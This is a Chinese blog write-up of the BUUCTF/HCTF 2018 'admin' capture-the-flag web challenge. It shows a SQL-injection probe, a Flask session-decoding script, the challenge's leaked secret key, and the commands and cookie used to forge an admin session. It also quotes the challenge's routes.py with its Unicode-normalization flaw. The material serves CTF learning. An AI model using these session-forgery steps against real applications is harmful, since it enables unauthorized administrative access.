buuctf--web--[HCTF 2018]admin

最新推荐文章于 2024-04-17 21:22:56 发布
最新推荐文章于 2024-04-17 21:22:56 发布
阅读量696 收藏 3
点赞数 2
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44866139/article/details/105991335
版权

先熟悉下网站,有这些功能:注册、登录、上传文章、修改密码、登出、无法注册admin,不能注册admin账户源码有提示
在这里插入图片描述注册一个admin账号,失败了,提示注册失败
在这里插入图片描述尝试注册界面看看有没有注入
username=1’–+
在这里插入图片描述大佬说有三种解法

flask session 伪造
unicode欺骗
条件竞争

flask session伪造

flask 源码解析:session

客户端 session 导致的安全问题

flask中session是存储在客户端cookie中的,也就是存储在本地。flask仅仅对数据进行了签名。众所周知的是,签名的作用是防篡改,而无法防止被读取。而flask并没有提供加密操作,所以其session的全部内容都是可以在客户端读取的,这就可能造成一些安全问题。

还是得多看源代码,修改密码部分有源代码的网址
在这里插入图片描述下载源码
在这里插入图片描述注册一个账号,然后登录后获得session
在这里插入图片描述session:".eJw9kEGLwjAQhf_KMmcPNtWL4GElUirMhLqtZXIRt1bbpHHZqlQj_vcNLsgc38z73psHbA99fW5gdumv9Qi27R5mD_j4hhmwzyIlqeMyG0jiWMniTiKLtcluKMLISmBSCPJdh54jcuzRVBPyaaRdMeV86VEuWjY40fmiwWTVoqNGJSxIkkXTWRa65ZyacCnQYYyBE_Ycm6bFcnlDbz25jSGzNrpcW3KrRsllYBQ39vauko3l_DiH5wiqc3_YXn5sfXpXQIvuDrP7kqi4DINkdIYzVGQ2Vst0ynJgHM8kK8GdMVYfc5fdq3bHeu305ed_hbDv3LauSBAJGIYwfVc96vQRTB8w82LmwS.Xr3kKA.wK7TeyCJ_MO5u-J9l7s0t9lQ0t4"

通过脚本将session解密一下:

#!/usr/bin/env python3
import sys
import zlib
from base64 import b64decode
from flask.sessions import session_json_serializer
from itsdangerous import base64_decode

def decryption(payload):
    payload, sig = payload.rsplit(b'.', 1)
    payload, timestamp = payload.rsplit(b'.', 1)

    decompress = False
    if payload.startswith(b'.'):
        payload = payload[1:]
        decompress = True

    try:
        payload = base64_decode(payload)
    except Exception as e:
        raise Exception('Could not base64 decode the payload because of '
                         'an exception')

    if decompress:
        try:
            payload = zlib.decompress(payload)
        except Exception as e:
            raise Exception('Could not zlib decompress the payload before '
                             'decoding the payload')

    return session_json_serializer.loads(payload)

if __name__ == '__main__':
    print(decryption(sys.argv[1].encode()))

想要伪造session我们还需要SECRET_KEY,在config.py里可以找到key

import os

class Config(object):
    **SECRET_KEY** = os.environ.get('SECRET_KEY') or 'ckj123'
    SQLALCHEMY_DATABASE_URI = 'mysql+pymysql://root:adsl1234@db:3306/test'
    SQLALCHEMY_TRACK_MODIFICATIONS = True

将session进行解密

python flask_session_cookie_manager3.py decode -s "ckj123" -c ".eJw9kEGLwjAUhP_KkrOHNnYvgodKusXCS6iklvcu4mrd5rVxoSrViP99i4c9zsB8zMxT7E5Dc2nF4jrcmpnYuaNYPMXHt1gIUF0wNo2RcUTbO7RZRLZtiY8OWbcYskB-4zBUI4TqYfIsMXbrjCofWlajtoeRFEQYIAbWTH7yJASQmx44jbTMIqzLOdl0JF51xOsACh960sYWHTBKo9JPsKte-w2DJ0e-lFhnd-RqnHKJVj1DjUvxmonDZTjtrr9dc_6foPMtk_oJJi_nui6Yphpg13etihZk0ZLaOsq_GFQZjDokYFOJ5fKNO-99MyH2R-_OsZiJ26UZ3veIOBavPwJ9ZlU.Xhpxig.hIQoJq3OWXbaekJ3fHF0Tl1cQPQ"

获得

{'_fresh': True, '_id': b'093905b60a9ba14e8af7bb3ac13fdbc503528a895b8427e0570d34c3523cfe07c33de2047a4ad7e00f0df2306250092d26680910e6dc2fbfd6aa1b50e0849c1f', 'csrf_token': b'4ecd838d75bcf3c12142a3bad5bdac043878106a', 'name': 'admin1', 'user_id': '11'}

index.html

{% include('header.html') %} {% if current_user.is_authenticated %}
Hello {{ session['name'] }}
{% endif %} {% if current_user.is_authenticated and session['name'] == 'admin' %}//获取session的条件
hctf{xxxxxxxxx}
{% endif %}
Welcome to hctf
{% include('footer.html') %} 
config.py

需要session name为admin时可以显示flag

再加密后替换cookie,将其中的admin1修改为admin,再使用flask_session_cookie_manager进行编码可得伪造后的session

.eJw9kEGLwjAUhP_KkrOHNnYvgodKusXCS6iklvcu4mrd5rVxoSrViP99i4c9zsB8zMxT7E5Dc2nF4jrcmpnYuaNYPMXHt1gIUF0wNo2RcUTbO7RZRLZtiY8OWbcYskB-4zBUI4TqYfIsMXbrjCofWlajtoeRFEQYIAbWTH7yJASQmx44jbTMIqzLOdl0JF51xOsACh960sYWHTBKo9JPsKte-w2DJ0e-lFhnd-RqnHKJVj1DjUvxmonDZTjtrr9dc_6foPMtk_oJJi_nui6Yphpg13etihZk0ZLaOsq_GFQZjDokYFOJ5fKNO-99MyH2R-_OYiZul2Z4vyPiWLz-AJ2yZiQ.XhqBtg.lLXBoac_fjTFLmMF5T4b90nw3rM

将其复制后重放,即可得到flag

Unicode欺骗

仔细观察路由routes.py

#!/usr/bin/env python
# -*- coding:utf-8 -*-

from flask import Flask, render_template, url_for, flash, request, redirect, session, make_response
from flask_login import logout_user, LoginManager, current_user, login_user
from app import app, db
from config import Config
from app.models import User
from forms import RegisterForm, LoginForm, NewpasswordForm
from twisted.words.protocols.jabber.xmpp_stringprep import nodeprep
from io import BytesIO
from code import get_verify_code

@app.route('/code')
def get_code():
    image, code = get_verify_code()
    # 图片以二进制形式写入
    buf = BytesIO()
    image.save(buf, 'jpeg')
    buf_str = buf.getvalue()
    # 把buf_str作为response返回前端,并设置首部字段
    response = make_response(buf_str)
    response.headers['Content-Type'] = 'image/gif'
    # 将验证码字符串储存在session中
    session['image'] = code
    return response

@app.route('/')
@app.route('/index')
def index():
    return render_template('index.html', title = 'hctf')

@app.route('/register', methods = ['GET', 'POST'])
def register():

    if current_user.is_authenticated:
        return redirect(url_for('index'))

    form = RegisterForm()
    if request.method == 'POST':
        name = strlower(form.username.data)
        if session.get('image').lower() != form.verify_code.data.lower():
            flash('Wrong verify code.')
            return render_template('register.html', title = 'register', form=form)
        if User.query.filter_by(username = name).first():
            flash('The username has been registered')
            return redirect(url_for('register'))
        user = User(username=name)
        user.set_password(form.password.data)
        db.session.add(user)
        db.session.commit()
        flash('register successful')
        return redirect(url_for('login'))
    return render_template('register.html', title = 'register', form = form)

@app.route('/login', methods = ['GET', 'POST'])
def login():
    if current_user.is_authenticated:
        return redirect(url_for('index'))

    form = LoginForm()
    if request.method == 'POST':
        name = strlower(form.username.data)
        session['name'] = name
        user = User.query.filter_by(username=name).first()
        if user is None or not user.check_password(form.password.data):
            flash('Invalid username or password')
            return redirect(url_for('login'))
        login_user(user, remember=form.remember_me.data)
        return redirect(url_for('index'))
    return render_template('login.html', title = 'login', form = form)

@app.route('/logout')
def logout():
    logout_user()
    return redirect('/index')

@app.route('/change', methods = ['GET', 'POST'])
def change():
    if not current_user.is_authenticated:
        return redirect(url_for('login'))
    form = NewpasswordForm()
    if request.method == 'POST':
        name = strlower(session['name'])
        user = User.query.filter_by(username=name).first()
        user.set_password(form.newpassword.data)
        db.session.commit()
        flash('change successful')
        return redirect(url_for('index'))
    return render_template('change.html', title = 'change', form = form)

@app.route('/edit', methods = ['GET', 'POST'])//在修改密码的时候先将name转成小写
def edit():
    if request.method == 'POST':
        
        flash('post successful')
        return redirect(url_for('index'))
    return render_template('edit.html', title = 'edit')

@app.errorhandler(404)
def page_not_found(error):
    title = unicode(error)
    message = error.description
    return render_template('errors.html', title=title, message=message)

def strlower(username):
    username = nodeprep.prepare(username)
    return username

重定义了strlower函数,使用nodeprep.prepare进行转换
在这里插入图片描述
在这里插入图片描述在这里插入图片描述在这里插入图片描述

一只小白来了
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF [HCTF 2018]admin
qq_42158602的博客
01-11 1074
第一步打开网址,就一个欢迎界面 旁边下拉菜单有个登录和注册界面 查看一下源码 有个注释 应该是提示我们用admin账号登录 先随便注册一个账号看看 登录成功后有三个界面 随便看了看 先去登录注册页面试试有什么注入没有 在注册界面试了一下约束攻击,密码随便输了一个123 — 这时的我还不明白事情的严重性 报错了 ,好像没行。不过这界面还能运行python 可以看见一些东西 ,感觉...
BUUCTF之 [HCTF 2018]admin
m0_62107966的博客
09-22 884
BUUCTF之 [HCTF 2018]admin-----这里的ckj123等下使用脚本时是需要用来作为参数的。刚刚以 1 用户登进去后给了个session源代码的意思是:用户如果以admin的身份登录,就直接可以拿到flag了,所以直接注册账号为admin,密码为123就成功拿到flag了。如果使用脚本的话,就需要伪造session为admin登陆的时候。使用脚本解密,脚本命名为session解密.py运行得到:得到如下:将name的值修改为admin,重新用脚本在进行加密。
BUUCTF:[HCTF 2018]admin1 write up
m0_73582652的博客
04-17 187
发现修改密码无需验证,可直接修改,这样就能直接修改admin的密码,从而登入后台。登录,password是data的newpassword的值。注册完之后发现网页出错,说明注入的payload有可能成功了。抓包看看,发现修改密码的网站和post的请求方式。进去之后发现有发布和修改密码功能,从功能点入手。我们先注册,登录进去看看里面网站有什么东西。发现没事发生,也有可能做了过滤,先放一边。刚进来看见这个网页,然后发现有注册和登录。先点击post发布,并尝试xss。登出,在注册写上xss代码。
BUUCTF [HCTF 2018]admin 1
weixin_45642610的博客
01-15 4827
BUUCTF [HCTF 2018]admin 1 进去后是这样,右上角有注册登录。看看主页源码。 看来如果是admin(管理员)会有东西不同。 随便注册一个账号,登录(注册登录的源码都看看,所有的页面源码都要看!找提示,甚至一行一行代码看)。 在改密码界面看到: 输网址,下载。 用pycharm或其他打开,审计代码。先看路由(route) 没什么特别的,就其他都看看。最后在templates目录下的index.html找到 如果session等于admin就出hctf{},即flag。 而提示
BUUCTF-[HCTF 2018]admin1
Monica的博客
11-15 6989
题目 分析 打开环境,页面啥也没有,日常查看源代码 提示说你不是admin,所以这题可能是我们为admin才可以得到flag 在login页面找到登录框 刚开始以为是sql注入,直接万能密码;结果试了几种方法发现不是报错就是提示用户名密码错误 ...
BUUCTF——[HCTF 2018]admin
Ho1aAs‘s Blog
05-16 818
文章目录利用点审题解题——Flask session解2——Unicode编码欺骗解3——(非预期)弱口令爆破参考完 利用点 Flask session Unicode编码欺骗 (非预期)弱口令爆破 审题 打开环境,主页仅提供了login和register两项服务,hctf的超链接打开是404 提示那么少,先看看主页的源码 结合题目以及提示,可以断定是要登录管理员账户,先注册一个账户,看看登录有些什么内容 新增了post和change password功能,在change password找到hin
开发工具 sb-admin-2
05-31
开发工具 sb-admin-2开发工具 sb-admin-2开发工具 sb-admin-2开发工具 sb-admin-2开发工具 sb-admin-2开发工具 sb-admin-2开发工具 sb-admin-2开发工具 sb-admin-2开发工具 sb-admin-2开发工具 sb-admin-2开发工具 ...
pve-admin-guide-7
最新发布
05-10
proxmox7使用说明
Good-mall-admin-web-master前端
08-08
Good-mall-admin-web-master前端Good-mall-admin-web-master前端Good-mall-admin-web-master前端
vue-vben-admin.md
07-30
vue-vben-admin.md
canal-admin
02-28
canal-admin
BUUCTF WEB [HCTF 2018]admin
Y1da的博客
04-17 805
BUUCTF WEB [HCTF 2018]admin 解法1 弱口令登录 admin 123 得到flag flag{195df147-fa34-4359-b475-94f71265d085} 解法2 F12查看网页源代码,在change页面发现一段注释 <!-- https://github.com/woadsl1234/hctf_flask/ --> 下载源代码分析,改网站由flask模板搭建,尝试SSTI模板注入。 查看路由信息 routes.py @app.route('
buuctf-web-[HCTF 2018]admin-wp
居上
07-18 255
[HCTF 2018]admin 知识点 flask session伪造 过程 主页,有注册点和登陆点: 登陆点,测试了一下,没有发现sql注入,然后我们随便注册一个账户123 123,登陆看看 登陆成功之后,有个提示,说明得使用admin账户登陆之后才能得到flag changepassword,这里发现源码 @app.route('/code') def get_code(): @app.route('/index') def index(): @app.route('/register
【BUUCTF】[HCTF 2018]admin——一上手flag就出现让我有措手不及,意犹未尽
algae
05-05 424
选择login 输入admin/123 真的,就这样,结束了?? yep flag{4e012e7f-7aa1-4ebf-ace7-51f7d70ee36a}
BUUCTF:[HCTF 2018]admin
末初的CSDN博客
10-28 769
题目地址:https://buuoj.cn/challenges#[HCTF%202018]admin 第一种解法:弱密码 根据提示,尝试弱密码登录admin用户,当admin的密码为123时,登陆成功 第二种解法:Unicode欺骗 随便注册个用户mochu7,在Change Password 给出来题目源码,/hctf_flask/app/rotus.py register和login对用户名使用了自定义函数strlower() nodeprep.prepare()来自 from tw.
[BUUCTF][HCTF 2018]admin
cosmoslin的博客
11-16 1133
考点 flask session伪造 unicode欺骗 条件竞争 法一:flask session伪造 查看源码,提示you are not admin,猜测需要admin登录 注册登录,网站功能页面很多,依次查看源码,在change password界面发现源码 是一个flask框架,进入routes.py,看一下注册和登录部分的源码 @app.route('/register', methods = ['GET', 'POST']) def register(): if current_
BUUCTF WEB admin1
qq_41696858的博客
09-03 766
这题考的是flask框架的session机制 和我以前观念里不太一样的一点是flask这个框架,session是完全存在本地的,只不过存在着一种加密算法,把它加密了存在了本地,也就是说我们只要有了加密密钥,那session里的值是完全可以被我们修改的 打开场景,查看源码,/login,/register是提示you are not admin 那么就是要以admin权限登录了,几个页面翻了几遍也没找到sql注入啥的漏洞,那只能考虑越权了 先注册一个普通用户,test,1234,登录,查看页面源码,发现a链接
buuctf之[HCTF 2018]admin
qq_42728977的博客
12-06 462
[HCTF 2018]admin考点session伪造流程思考参考 考点 1、弱口令 2、flask框架 session伪造 3、代码审计 unicode strlower()函数审计 session伪造流程 change页面的源码,泄露后台源码 index源码看得到,要admin登录 所以查看后台源码 发现需要登录认证和session[‘name’]为admin,那就伪造呗。 flask session伪造 session漏洞 流程: 先注册一个用户test/test,并登录 拿到session,
buuctf|[HCTF 2018]admin 1
m0_64236521的博客
02-04 370
[HCTF 2018]admin 1
mall-admin-web-master
07-20
mall-admin-web-master 是一个商城管理系统的前端项目。该项目采用了现代化的前端技术栈,包括 Vue.js 框架、Element-UI 组件库等,以提供一个用户友好、功能强大的商城管理界面。 mall-admin-web-master 的主要...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值